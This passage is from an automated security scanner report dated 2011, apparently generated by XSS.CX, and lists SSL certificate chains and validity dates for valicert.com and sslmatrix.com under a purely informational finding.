Valid from:	Tue Jun 29 11:06:20 GMT-06:00 2004
Valid to:	Sat Jun 29 11:06:20 GMT-06:00 2024

Certificate chain #3

Issued to:	http://www.valicert.com/
Issued by:	http://www.valicert.com/
Valid from:	Fri Jun 25 18:19:54 GMT-06:00 1999
Valid to:	Tue Jun 25 18:19:54 GMT-06:00 2019

Certificate chain #4

Issued to:	http://www.valicert.com/
Issued by:	http://www.valicert.com/
Valid from:	Fri Jun 25 18:19:54 GMT-06:00 1999
Valid to:	Tue Jun 25 18:19:54 GMT-06:00 2019

29.7. https://www.sslmatrix.com/ previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sslmatrix.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.sslmatrix.com
Issued by:	GeoTrust DV SSL CA
Valid from:	Wed Dec 15 06:37:49 GMT-06:00 2010
Valid to:	Tue Jan 17 00:51:25 GMT-06:00 2012

Certificate chain #1

Issued to:	GeoTrust DV SSL CA
Issued by:	GeoTrust Global CA
Valid from:	Fri Feb 26 15:32:31 GMT-06:00 2010
Valid to:	Tue Feb 25 15:32:31 GMT-06:00 2020

Certificate chain #2

Issued to:	GeoTrust Global CA
Issued by:	GeoTrust Global CA
Valid from:	Mon May 20 22:00:00 GMT-06:00 2002
Valid to:	Fri May 20 22:00:00 GMT-06:00 2022

Report generated by XSS.CX at Sat Sep 03 18:34:40 GMT-06:00 2011.